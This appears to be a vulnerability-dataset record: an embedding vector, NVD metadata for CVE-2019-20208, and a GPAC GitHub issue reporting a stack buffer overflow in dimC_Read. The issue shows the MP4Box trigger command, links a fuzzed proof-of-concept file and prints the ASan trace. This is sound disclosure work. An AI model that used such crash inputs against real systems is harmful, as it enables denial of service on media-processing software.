0.028384603559970856, 0.001828426611609757, -0.0012029543286189437, -0.019592799246311188, -0.030329806730151176, 0.01781396195292473, 0.018236275762319565, -0.011325687170028687, 0.0213332436978817, 0.007512066047638655, -0.0006774616776965559, -0.014077125117182732, -0.016585413366556168, 0.019119296222925186, -0.014141112565994263, 0.00864463485777378, -0.007358497474342585, -0.0036184610798954964, 0.0013421259354799986, -0.014755386859178543, -0.007761614862829447, 0.021960316225886345, 0.009463667869567871, -0.0016396652208641171, -0.005064565688371658, 0.010634628124535084, -0.011408870108425617, -0.009962765499949455, -0.02614506147801876, 0.009066948667168617, -0.005106157157570124, -0.010737007483839989, 0.0036184610798954964, 0.03135359659790993, 0.005704435054212809, 0.013334876857697964, 0.013194105587899685, 0.02221626415848732, 0.010359484702348709, 0.014653007499873638, 0.005691637750715017, -0.00721132755279541, -0.004271127749234438, -0.020219871774315834, -0.006200334057211876, -0.0048278141766786575, -0.017583608627319336, -0.0013933154987171292, -0.012522242963314056, 0.01156883779913187, -0.01986154355108738, -0.02197311259806156, 0.001734045916236937, 0.0027002485003322363, 0.021819544956088066, -0.02204989828169346, 0.008350295014679432, -0.028461387380957603, 0.009508457966148853, -0.01777557097375393, 0.0049781836569309235, -0.0029897894710302353, 0.005531670525670052, -0.030201833695173264, -0.004450291395187378, -0.01992553099989891, -0.004325516521930695, 0.02782151848077774, -0.016969334334135056, -0.014499438926577568, -0.00362805905751884, 0.0023867127019912004, -0.004642251878976822, 0.0196823813021183, 0.0028202240355312824, 0.024698955938220024, -0.026644159108400345, 0.014051530510187149, 0.016073517501354218, -0.00435751024633646, 0.0028970083221793175, 0.025274839252233505, -0.017276471480727196, -0.0029977879021316767, 0.009130935184657574, -0.0055892588570714, 0.007294510491192341, -0.02423825114965439, -0.013987543992698193, 0.010378681123256683, 0.009924373589456081, 0.010141928680241108, 0.0034520949702709913, 0.017378851771354675, -0.015241687186062336, 0.01883775368332863, -0.011965557001531124, -0.007608046289533377, -0.007070556282997131, 0.020616590976715088, 0.0019548009149730206, -0.018824955448508263, 0.0054068961180746555, -0.012375072576105595, -0.014384263195097446, 0.02614506147801876, 0.0002293531724717468, 0.0013021341292187572, 0.017711583524942398, 0.015369661152362823, 0.010199517011642456, 0.0010837786830961704, 0.0021915524266660213, -0.01360362209379673, 0.0009885980980470777, -0.01133208628743887, 0.020731765776872635, 0.008503863587975502, 0.021000511944293976, 0.0005826810374855995, -0.00001658411383687053, 0.012701406143605709, -0.0036408565938472748, 0.003922399133443832, 0.019567204639315605, 0.01088417787104845, -0.023918315768241882, -0.018261870369315147, -0.000467904465040192, 0.019631192088127136, 0.012567033991217613, -0.012355877086520195, -0.014230693690478802, -0.006213131360709667, 0.002055580262094736, 0.018300263211131096, -0.01873537339270115, -0.0040279775857925415, 0.025377217680215836, 0.012266295030713081, -0.012643817812204361, -0.016457438468933105, 0.0044278958812355995, -0.015254485420882702, -0.0038456146139651537, -0.021819544956088066, -0.000760244729463011, 0.010506654158234596, 0.005816412158310413, 0.026055479422211647, -0.012349477969110012, 0.001029389793984592, 0.021627584472298622, 5.155197300155123e-7, 0.006872196681797504, -0.01951601542532444, -0.0016196692595258355, 0.009783602319657803, 0.012400668114423752, 0.010346687398850918, 0.006699432153254747, 0.01986154355108738, 0.019080903381109238, 0.011479255743324757, -0.017084510996937752, 0.013590824790298939, 0.012010347098112106, -0.004635853227227926, 0.021653179079294205, 0.002044382505118847, 0.0025898711755871773, -0.011447262018918991, -0.018824955448508263, 0.0034808891359716654, -0.025070080533623695, -0.016623806208372116, 0.01554882526397705, -0.023623976856470108, -0.013693204149603844, 0.02334243431687355, 0.02771914005279541, 0.003669650759547949, -0.007249719463288784, 0.0025994691532105207, 0.0005870801396667957, -0.006769817788153887, -0.012957354076206684, 0.011901569552719593, 0.006916987709701061, -0.008836595341563225, 0.014550629071891308, -0.0019436031579971313, 0.005928389262408018, 0.031046459451317787, -0.0029274022672325373, -0.00725611811503768, 0.010916170664131641, -0.023048093542456627, 0.0047990200109779835, 0.016419047489762306, -0.009220517240464687, -0.009815596044063568, -0.008087948895990849, -0.008599843829870224, -0.011242504231631756, 0.008497464470565319, -0.019132092595100403, 0.016636602580547333, 0.015497635118663311, 0.0021515607368201017, 0.01812109909951687, 0.005371703300625086, 0.016495831310749054, 0.010877778753638268, -0.03882727026939392, -0.0048470101319253445, -0.016380654647946358, 0.009463667869567871, 0.010186719708144665, 0.0030649742111563683, 0.0063507030718028545, 0.007096150889992714, 0.01757081225514412, 0.03956951946020126, 0.00018356251530349255, 0.007550458423793316, 0.005867601837962866, 0.015459243208169937, -0.00019556006009224802, 0.00939968042075634, -0.006942582316696644, -0.005400497000664473, 0.0037784285377711058, -0.012445458211004734, -0.005214935168623924, 0.005637248978018761, -0.01437146496027708, -0.007121745962649584, -0.007409687153995037, -0.005029372870922089, 0.006961778271943331, -0.009406079538166523, 0.019503217190504074, -0.016111910343170166, 0.004287124611437321, 0.028512578457593918, -0.0020059903617948294, -0.001183758256956935, -0.014000341296195984, -0.024839727208018303, -0.023099282756447792, -0.0065010725520551205, -0.0008854191983118653, -0.003884006990119815, 0.011428066529333591, -0.008459072560071945, 0.0007590450113639235, 0.0080495560541749, 0.0015308874426409602, -0.0006550662219524384, 0.012995745986700058, 0.008932575583457947, 0.006968176923692226, -0.0038616114761680365, -0.006712229456752539, -0.006814608350396156, -0.011677615344524384, 0.003884006990119815, 0.021307649090886116, -0.007793608587235212, -0.030918486416339874, 0.005096559412777424, 0.008222321048378944, 0.02299690432846546, -0.01914489082992077, -0.007428883109241724, -0.008190327323973179, -0.0013557231286540627, 0.01452503353357315, -0.01471699494868517, 0.005310915410518646, 0.02146121673285961, 0.0009006161126308143, 0.003669650759547949, -0.010116334073245525, 0.007838399149477482, 0.012266295030713081, 0.007761614862829447, -0.0008894183556549251, 0.02225465513765812, -0.00758885033428669, -0.01783955655992031, -0.011204112321138382, -0.007083353586494923, -0.002607467584311962, -0.00953405350446701, -0.010845785029232502, 0.007000170648097992, 0.0010229911422356963, -0.010148327797651291, 0.022817740216851234, -0.05257166549563408, -0.0005038970848545432, 0.00050629663746804, 0.0001797632867237553, 0.016636602580547333, 0.02268976718187332, 0.009041354060173035, -0.018888942897319794, 0.0023515198845416307, -0.023406419903039932, 0.02197311259806156, 0.001582876779139042, -0.03107205592095852, -0.01128089614212513, 0.04829733818769455, -0.008804602548480034, 0.008817399851977825, 0.017340458929538727, 0.019541610032320023, 0.01640624925494194, 0.00924611184746027, -0.012522242963314056, -0.002535482170060277, -0.005083762109279633, 0.005109356716275215, 0.0026474592741578817, -0.0034041048493236303, -0.010225111618638039, -0.018978524953126907, -0.014537831768393517, -0.004773425403982401, 0.005989177152514458, -0.014320275746285915, 0.026439400389790535, -0.005787617992609739, -0.01435866765677929, -0.021371636539697647, 0.026106668636202812, -0.017033321782946587, 0.022088289260864258, 0.016738981008529663, -0.014000341296195984, 0.011607229709625244, 0.02051421068608761, 0.0010997754288837314, -0.02577393688261509, 0.005429291166365147, 0.018581805750727654, -0.007454477716237307, 0.0014716994483023882, -0.011242504231631756, 0.00421353941783309, -0.019848747178912163, 0.019080903381109238, -0.0011285695945844054, -0.01780116558074951, -0.0007650437764823437, 0.006331507116556168, -0.005797216203063726, -0.002733841771259904, 0.01112732756882906, 0.008382288739085197, 0.00556366378441453, -0.010423471219837666, -0.016214288771152496, -0.006261121481657028, 0.017097309231758118, 0.020552603527903557, -0.0055892588570714, -0.022203465923666954, 0.004955788142979145, 0.008081549778580666, 0.008625438436865807, 0.030713727697730064, 0.006923386361449957, 0.004709438420832157, -0.011741602793335915, 0.0003197347105015069, -0.013654811307787895, -0.013411661610007286, 0.004863006994128227, 0.009374085813760757, -0.024071885272860527, 0.007819203659892082, -0.002181954449042678, -0.0022043499629944563, -0.00022455414000432938, 0.0044950819574296474, 0.007691229227930307, 0.005691637750715017, -0.010794595815241337, -0.009956367313861847, -0.009303700178861618, 0.0017772370483726263, -0.010052347555756569, -0.02358558401465416, 0.02720724418759346, -0.0035416767932474613, -0.01728926971554756, 0.012138321064412594, -0.022433819249272346, 0.020744564011693, -0.0009574044961482286, -0.003117763437330723, -0.002469895640388131, 0.008906980976462364, -0.002625063993036747, -0.007454477716237307, 0.002207549288868904, -0.009905177168548107, 0.03585827723145485, -0.0034904873464256525, 0.006219530012458563, 0.02802627719938755, -0.012547837570309639, 0.022920120507478714, 0.0028298222459852695, 0.007544059306383133, 0.012950954958796501, -0.004591062664985657, -0.002621864667162299, -0.00011957558308495209, -0.0038744087796658278, -0.006833804305642843, 0.012675811536610126, 0.004309520125389099, 0.0008918179082684219, -0.006433886010199785, -0.007582451682537794, 0.011652020737528801, -0.009937170892953873, 0.01681576669216156, 0.00485340878367424, 0.013590824790298939, -0.0022747355978935957, -0.002306728856638074, -0.004709438420832157, -0.007352098822593689, -0.01585596241056919, 0.008830197155475616, -0.005483680404722691, -0.018364250659942627, -0.03260774165391922, -0.0010813791304826736, -0.010577039793133736, -0.024071885272860527, -0.002255539409816265, 0.028794120997190475, -0.025863518938422203, 0.023291243240237236, 0.00952125620096922, 0.014294681139290333, 0.012605425901710987, 0.011530445888638496, -0.002498689806088805, -0.01110813207924366, 0.019400838762521744, -0.003304925048723817, 0.011664818041026592, -0.01209992915391922, -0.00488860160112381, 0.01209992915391922, -0.01307253073900938, -0.01886334829032421, 0.001857220777310431, 0.020923728123307228, 0.006485075689852238, 0.002901807427406311, 0.008222321048378944, 0.02143562212586403, -0.021627584472298622, 0.013654811307787895, -0.004584664013236761, -0.020616590976715088, -0.015382458455860615, 0.037138015031814575, -0.026439400389790535, 0.023124877363443375, 0.022792145609855652, 0.0020971717312932014, -0.006763419136404991, -0.03107205592095852, -0.012573432177305222, -0.001655661966651678, -0.002671454567462206, -0.011824785731732845, 0.007288111839443445, -0.0016396652208641171, 0.0061779385432600975, 0.0028170247096568346, 0.01437146496027708, -0.005352506879717112, 0.018197884783148766, -0.03811061754822731, 0.01240706630051136, 0.0074800727888941765, -0.008222321048378944, 0.009879582561552525, 0.008766209706664085, -0.0029034072067588568, -0.005918791517615318, 0.032658930867910385, -0.007505667395889759, 0.005086961202323437, -0.009681222960352898, -0.012311086058616638, 0.01814669370651245, -0.004562268499284983, -0.014627412892878056, -0.007076954934746027, 0.00451107881963253, 0.005947585683315992, 0.025812329724431038, 0.001106174080632627, -0.003685647388920188, 0.0011845581466332078, -0.004341513384133577, -0.01650862954556942, -0.030688133090734482, 0.028563767671585083, -0.0057012359611690044, 0.014704197645187378, -0.012509445659816265, 0.032147035002708435, -0.00025114871095865965, -0.0009486062917858362, -0.0011397672351449728, 0.014435452409088612, 0.01595834083855152, 0.009540451690554619, 0.0012621423229575157, 0.011786392889916897, 0.02266417257487774, 0.0016972534358501434, 0.0013277288526296616, 0.005326912272721529, 0.007409687153995037, -0.005176542792469263, -0.01202954351902008, -0.016188694164156914, -0.007339301519095898, 0.0007218525861389935, -0.007294510491192341, -0.0041047618724405766, -0.010116334073245525, 0.024481400847434998, 0.009348491206765175, 0.012822981923818588, 0.006744222715497017, 0.023508800193667412, -0.005659644491970539, -0.004677444696426392, -0.013731596060097218, -0.018031517043709755, -0.01128089614212513, -0.019848747178912163, 0.02710486575961113, 0.007902386598289013, -0.0011421667877584696, 0.0035128826275467873, 0.027156054973602295, 0.00672502676025033, 0.005851604975759983, -0.0035384774673730135, 0.015638407319784164, 0.021653179079294205, 0.019439229741692543, 0.008107144385576248, 0.006072360090911388, -0.015075321309268475, 0.004536673426628113, 0.018991321325302124, 0.012163915671408176, 0.015766380354762077, 0.013782785274088383, 0.002473094966262579, -0.010436268523335457, 0.017852354794740677, 0.001119771390222013, -0.015049726702272892, -0.006699432153254747, -0.0165726151317358, 0.019260067492723465, -0.004517477471381426, -0.01914489082992077, 0.005035771522670984, 0.018914537504315376, 0.01345005352050066, -0.015868758782744408, -0.023867126554250717, -0.015868758782744408, -0.004597461316734552, 0.03168632835149765, -0.014640210196375847, 0.0007938378839753568, 0.0005074963555671275, -0.004187944810837507, -0.009028556756675243, 0.002580273197963834, -0.016009530052542686, -0.007012967951595783, -0.010551445186138153, 0.011447262018918991, -0.0036152617540210485, 0.0033849088940769434, -0.0078128045424819, -0.012381471693515778, 0.009290902875363827, -0.007012967951595783, -0.006120350211858749, 0.0029401995707303286, -0.002545080380514264, 0.0035960657987743616, -0.018402641639113426, -0.008523060008883476, -0.0192088782787323, 0.0056276507675647736, -0.006462680175900459, 0.0038584121502935886, 0.008849392645061016, -0.014166707172989845, 0.01314291637390852, -0.014857766218483448, 0.0011005753185600042, 0.006980974692851305, -0.0018060312140733004, 0.011811988428235054, -0.03370831534266472, 0.01937524415552616, 0.004507879260927439, 0.013923556543886662, 0.007307307794690132, -0.005128552671521902, 0.007467275019735098, -0.011664818041026592, 0.01579197496175766, 0.0015308874426409602, 0.0027978287544101477, 0.006117150653153658, 0.0018748171860352159, -0.02068057656288147, -0.013629216700792313, -0.01634226366877556, 0.010007556527853012, 0.02115407958626747, 0.03332439437508583, -0.014435452409088612, 0.0024347028229385614, 0.0005758823826909065, -0.005381301045417786, 0.0024379021488130093, 0.01798032782971859, -0.005566863343119621, 0.013034138828516006, 0.01502413209527731, -0.011895171366631985, 0.009898778982460499, 0.0030953679233789444, 0.01728926971554756, -0.009719614870846272, 0.006190735846757889, -0.0072049289010465145, -0.015868758782744408, 0.00984119065105915, -0.004840611480176449, 0.005128552671521902, 0.015305674634873867, -0.015612811781466007, -0.01451223623007536, -0.000017833857782534324, 0.00485340878367424, -0.009137334302067757, 0.0036504545714706182, -0.011031347326934338, -0.006955379620194435, -0.02450699545443058, 0.01853061653673649, -0.019183283671736717, -0.0027978287544101477, 0.007243320811539888, 0.00840788334608078, 0.0031113645527511835, 0.000261546578258276, -0.026170656085014343, 0.002425104845315218, 0.011556040495634079, 0.0057076346129179, 0.022190669551491737, 0.005346108227968216, 0.02399509958922863, -0.013897961936891079, -0.015907151624560356, 0.011645621620118618, 0.0007458477048203349, -0.011677615344524384, 0.013488445430994034, 0.007857595570385456, -0.012720602564513683, 0.0023275248240679502, -0.002717844909057021, 0.0029545966535806656, -0.01705891638994217, 0.003868010127916932, -0.005243729334324598, -0.028256630524992943, 0.0041047618724405766, 0.005435689818114042, 0.009476465173065662, 0.010186719708144665, -0.001043786876834929, -0.013949151150882244, -0.008855791762471199, 0.006923386361449957, -0.009566046297550201, 0.005314114969223738, 0.00556366378441453, 0.007000170648097992, -0.022241858765482903, -0.011581635102629662, 0.002930601593106985, 0.011082536540925503, 0.03964630514383316, 0.02272815816104412, -0.0019755966495722532, -0.031020864844322205, -0.010653824545443058, -0.00485340878367424, 0.008676628582179546, 0.002073176670819521, 0.0045238761231303215, 0.017890747636556625, -0.011351281777024269, -0.032249413430690765, 0.0019548009149730206, -0.02119247242808342, -0.015766380354762077, -0.0026922503020614386, 0.012656615115702152, -0.012087131850421429, 0.00037012441316619515, -0.0009046152699738741, 0.0044758860021829605, -0.001274939626455307, -0.0073009091429412365, 0.014908955432474613, 0.01845383085310459, 0.016662197187542915, 0.013014942407608032, -0.016380654647946358, -0.003269732231274247, -0.03271012008190155, -0.0026954496279358864, -0.0025722747668623924, 0.015446445904672146, 0.014832171611487865, 0.0030345802661031485, 0.000025257342713302933, 0.017852354794740677, 0.02379034273326397, -0.005832409020513296, -0.013098125346004963, -0.014051530510187149, -0.01947762258350849, -0.009585242718458176, -0.02464776672422886, -0.027693545445799828, -0.006731425411999226, -0.025070080533623695, -0.003733637509867549, 0.02894768863916397, 0.013885164633393288, 0.018543412908911705, -0.005909193307161331, 0.0038872063159942627, 0.0137571906670928, 0.004440693184733391, 0.0005558864795602858, -0.006062761880457401, 0.021729962900280952, -0.00038032233715057373, 0.0171612948179245, 0.00718573248013854, 0.0008062353590503335, -0.009047752246260643, 0.018888942897319794, -0.011357680894434452, -0.010685818269848824, 0.01728926971554756, 0.0051797423511743546, 0.009284503757953644, 0.04553310200572014, -0.0017004527617245913, 0.016534224152565002, 0.008791804313659668, -0.01961839385330677, 0.0032793304417282343, -0.03391307592391968, 0.004181546159088612, -0.03721480071544647, -0.0016348661156371236, -0.008036758750677109, -0.00567244179546833, -0.019080903381109238, 0.003484088461846113, -0.015356863848865032, 0.01082019042223692, 0.002476294292137027, -0.0001968598080566153, -0.006152343470603228, 0.0015836766688153148, 0.001226949505507946, 0.006424288265407085, 0.019080903381109238, -0.00555406603962183, -0.006622647866606712, -0.003743235720321536, -0.007492870092391968, 0.012503046542406082, 0.02248500846326351, 0.013334876857697964, -0.0036728500854223967, 0.016841361299157143, -0.012656615115702152, -0.026746537536382675, 0.005704435054212809, 0.00556366378441453, -0.010423471219837666, 0.0043031214736402035, -0.03171192482113838, 0.0008454273920506239, -0.018223479390144348, 0.008267112076282501, -0.012176713906228542, -0.01749402843415737, 0.0012253497261554003, 0.00947006605565548, -0.008945373818278313, 0.0034648925065994263, 0.013616419397294521, -0.01426908653229475, -0.005230932030826807, -0.02553078718483448, 0.006187536288052797, 0.001134968246333301, -0.02324005402624607, 0.007614444941282272, 0.0017132501816377044, -0.002994588576257229, 0.006629046518355608, 0.008382288739085197, 0.014397060498595238, 0.0023291243705898523, -0.005381301045417786, 0.0003319322131574154, -0.010141928680241108, 0.015472040511667728, -0.014473844319581985, 0.014038733206689358, 0.01472979225218296, -0.0016164699336513877, 0.006744222715497017, -0.004936591722071171, 0.010935367085039616, -0.0030665737576782703, 0.000951805617660284, -0.03253095597028732, 0.015088118612766266, -0.0101547259837389, -0.021525204181671143, -0.00013147314894013107, 0.017545217648148537, 0.01284857653081417, 0.008247915655374527, 0.013475648127496243, -0.009943569079041481, 0.0017148498445749283, 0.042948029935359955, -0.0062739187851548195, 0.010391478426754475, -0.01876096986234188, 0.008945373818278313, 0.0021099690347909927, 0.02037343941628933, 0.012771791778504848, -0.0009198121842928231, 0.03250536322593689, -0.006980974692851305, 0.017890747636556625, 0.014678603038191795, 0.004805418662726879, -0.002042782958596945, -0.04189864546060562, -0.019157687202095985, -0.014486641623079777, -0.013514040037989616, 0.005845206324011087, -0.0034265003632754087, -0.00037492343108169734, 0.004338314291089773, 0.015267282724380493, 0.007390490733087063, 0.0020859739743173122, 0.010685818269848824, -0.011376876384019852, 0.005557265132665634, -0.004607059061527252, 0.006955379620194435, -0.007294510491192341, -0.0010965761030092835, -0.006145944818854332, 0.011645621620118618, -0.0014253089902922511, -0.020002314820885658, -0.00703216390684247, 0.018031517043709755, -0.005989177152514458, -0.0020779757760465145, -0.004747830331325531, -0.006251523271203041, 0.016559818759560585, 0.0029833908192813396, 0.0032121441327035427, -0.024481400847434998, 0.023304041475057602, 0.010730608366429806 ]
2,265
CVE-2019-20208
2020-01-02T14:16:36.363000
dimC_Read in isomedia/box_code_3gpp.c in GPAC 0.8.0 has a stack-based buffer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1348" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00017.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1348
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_3gpp.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [011-stack-dimC_Read1000](https://github.com/gutiniao/afltest/blob/master/011-stack-dimC_Read1000) The ASAN information is as follows: ``` ./MP4Box -diso 011-stack-dimC_Read1000 -out /dev/null ================================================================= ==3045==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e0d88d0 at pc 0x564b9b2d69fb bp 0x7fff6e0d8480 sp 0x7fff6e0d8470 WRITE of size 1 at 0x7fff6e0d88d0 thread T0 #0 0x564b9b2d69fa in dimC_Read isomedia/box_code_3gpp.c:1000 #1 0x564b9ae5bb35 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x564b9ae5bb35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x564b9ae5c1e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x564b9ae72f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x564b9ae75bca in gf_isom_open_file isomedia/isom_intern.c:615 #6 0x564b9abbe852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #7 0x7f4b5d817b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x564b9abafb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) Address 0x7fff6e0d88d0 is located in stack of thread T0 at offset 1056 in frame #0 0x564b9b2d641f in dimC_Read isomedia/box_code_3gpp.c:983 This frame has 1 object(s): [32, 1056) 'str' <== Memory access at offset 1056 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow isomedia/box_code_3gpp.c:1000 in dimC_Read Shadow bytes around the buggy address: 0x10006dc130c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006dc13110: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 0x10006dc13120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13130: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 0x10006dc13140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13160: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3045==ABORTING ```
There is a stack-buffer-overflow in the dimC_Read function of box_code_3gpp.c:1000
https://api.github.com/repos/gpac/gpac/issues/1348/comments
2
2019-11-13T07:25:13
2020-01-08T12:45:44Z
https://github.com/gpac/gpac/issues/1348
522,010,451
1,348
true
This is a GitHub Issue repo:gpac owner:gpac Title : There is a stack-buffer-overflow in the dimC_Read function of box_code_3gpp.c:1000 Issue date: --- start body --- Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_3gpp.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [011-stack-dimC_Read1000](https://github.com/gutiniao/afltest/blob/master/011-stack-dimC_Read1000) The ASAN information is as follows: ``` ./MP4Box -diso 011-stack-dimC_Read1000 -out /dev/null ================================================================= ==3045==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff6e0d88d0 at pc 0x564b9b2d69fb bp 0x7fff6e0d8480 sp 0x7fff6e0d8470 WRITE of size 1 at 0x7fff6e0d88d0 thread T0 #0 0x564b9b2d69fa in dimC_Read isomedia/box_code_3gpp.c:1000 #1 0x564b9ae5bb35 in gf_isom_box_read isomedia/box_funcs.c:1528 #2 0x564b9ae5bb35 in gf_isom_box_parse_ex isomedia/box_funcs.c:208 #3 0x564b9ae5c1e4 in gf_isom_parse_root_box isomedia/box_funcs.c:42 #4 0x564b9ae72f44 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:206 #5 0x564b9ae75bca in gf_isom_open_file isomedia/isom_intern.c:615 #6 0x564b9abbe852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #7 0x7f4b5d817b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x564b9abafb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) Address 0x7fff6e0d88d0 is located in stack of thread T0 at offset 1056 in frame #0 0x564b9b2d641f in dimC_Read isomedia/box_code_3gpp.c:983 This frame has 1 object(s): [32, 1056) 'str' <== Memory access at offset 1056 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow isomedia/box_code_3gpp.c:1000 in dimC_Read Shadow bytes around the buggy address: 0x10006dc130c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc130f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10006dc13110: 00 00 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 0x10006dc13120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13130: 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 00 00 00 00 0x10006dc13140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10006dc13160: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3045==ABORTING ``` --- end body ---
4,099
